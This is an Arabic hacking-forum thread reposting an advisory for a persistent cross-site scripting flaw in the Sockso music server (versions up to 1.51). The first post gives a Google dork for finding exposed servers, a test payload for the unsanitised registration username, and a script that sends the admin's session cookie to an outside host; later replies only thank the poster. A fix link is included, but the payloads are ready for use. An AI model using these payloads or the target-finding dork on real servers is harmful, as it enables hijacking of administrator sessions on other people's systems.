ثغره جديده { Sockso <=1.51 Persistent XSS }

ثغره جديده { Sockso <=1.51 Persistent XSS }


النتائج 1 إلى 3 من 3

الموضوع: ثغره جديده { Sockso <=1.51 Persistent XSS }

  1. #1

    Gadid ثغره جديده { Sockso <=1.51 Persistent XSS }

    السلام عليكم و رحمة الله و بركاته

    ################################################## #####################

    Application: Sockso
    http://sockso.pu-gh.com
    Versions: <= 1.5
    Platforms: Windows, Mac, Linux
    Bug: Persistant XSS
    Exploitation: remote
    Date: 11 May 2012.
    Author: Ciaran McNally
    Web: http://smwyg.com/blog/#sockso-persistant-xss-attack

    Google Dork: inurl:"4444" sockso

    ################################################## #####################

    1) Bug.
    2) The exploit.
    3) Fix.

    ################################################## #####################
    Sockso is a free, open-source, personal music host server for
    everyone! It's designed to be as simple as possible so that anyone with
    a mouse and some mp3's can get their friends listening to their music
    across the internet in seconds!"
    ################################################## #####################

    ======
    1) Bug
    ======

    On Registration page (normally @ "4444/user/register") the username
    input is never sanitized. This is then stored in the database of users
    and displayed in the admin panel & user pages.

    ################################################## #####################

    ==============
    2) The exploit
    ==============

    Using a username value of...

    **********alert('xss');</script>

    Or the admin cookie session can also be retrieved by using...

    <script >new Image().src="bleh.com/xss.php?c="+encodeURI(document.cookie)</script>


    ################################################## #####################

    ======
    3) Fix
    ======

    https://github.com/rodnaph/sockso/pull/99/files


    ################################################## #####################


    رابط الثغره : http://www.exploit-db.com/exploits/18868


    تحياتي

  2. #2
    :: مشرف قسم الباك تراك :: الصورة الرمزية يارب رحمتك
    تاريخ التسجيل
    May 2012
    الدولة
    روح العرب
    المشاركات
    1,147

    افتراضي رد: ثغره جديده { Sockso <=1.51 Persistent XSS }

    كل الشكر والعرفان لك .. على مواضيعك الثمينة ...
    حتى لو لم اصل لهذا المستوى من العلم ...
    بآلتوفيق عزيزى


    youtube

    [ما يلفظ من قول الا لديه رقيب عتيد]
    [ آفعل مآ شئت فكمآ تديُن تدآن ]

    hacker ▎security ▎no Breach>>
    [ mohamed -kareb ]


  3. #3

    افتراضي رد: ثغره جديده { Sockso <=1.51 Persistent XSS }

    [
    كل الشكر والعرفان لك .. على مواضيعك الثمينة ...
    حتى لو لم اصل لهذا المستوى من العلم ...
    بآلتوفيق عزيزى

    تسلم يآ غالي

    أشكركـ على مروركـ

    تحياتي

المواضيع المتشابهه

  1. ثغره جديده { Galette (picture.php) SQL Injection Vulnerability }
    بواسطة اخلاقي تاج راسي في المنتدى قسم الثغرات
    مشاركات: 3
    آخر مشاركة: 05-24-2012, 09:36 AM
  2. ثغره جديده..مش عارف إزاى أوصلها..
    بواسطة black_dream في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 3
    آخر مشاركة: 05-14-2012, 05:50 PM
  3. ثغره جديده اسمها vbulletin_md5
    بواسطة kapos في المنتدى قسم الثغرات
    مشاركات: 15
    آخر مشاركة: 01-11-2012, 11:15 AM
  4. ثغره جديده بالتنسيق الشعري
    بواسطة وحـThuGـش في المنتدى منتدى حماية المواقع والمنتديات
    مشاركات: 4
    آخر مشاركة: 11-27-2011, 04:01 PM
  5. ثغره جديده للمتصفح 7 Remote Code Execution
    بواسطة Spy4Man في المنتدى منتدى الإختراق العام
    مشاركات: 4
    آخر مشاركة: 08-24-2010, 05:43 AM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •